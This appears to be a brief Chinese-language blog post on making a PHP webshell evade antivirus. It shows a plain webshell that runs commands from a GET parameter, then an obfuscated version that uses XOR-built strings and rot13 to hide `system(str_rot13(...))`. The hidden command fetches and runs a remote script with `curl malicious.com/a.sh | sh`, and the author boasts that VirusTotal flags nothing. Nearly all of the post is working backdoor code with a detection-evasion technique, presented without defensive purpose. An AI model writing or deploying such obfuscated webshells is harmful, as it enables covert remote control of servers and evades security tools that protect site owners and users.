簡單 PHP Webshell 免殺


原本想隨便寫一個 Webshell 測試使用,但一下就被 Defender 吃掉了

<?php
system($_GET[A]);

然後發現隨便繞一下,就輕鬆過了 ?__?

<?php
$a="BK@@P["; // $a ^ $b = "system"
$b="123456"; // 就隨便打一段數字
$c="BFAkGY"; // $b ^ $c = "str_ro"
$e="phey znyvpvbhf.pbz/n.fu | fu"; // 用 rot13 (凱薩加密移位 13) "curl malicious.com/a.sh | sh"
echo ($a^$b)(($b^$c)."t13")($e); 
// ($a^$b) => "system"
// ($b^$c) => "str_ro"
// "str_ro"."t13" => "str_rot13"
// ("system")(("str_rot13")($e)) => system(str_rot13($e))
// system(str_rot13($e)) => system("curl malicious.com/a.sh | sh")

在 VirusTotal 上竟然 All pass ㄏ


發表迴響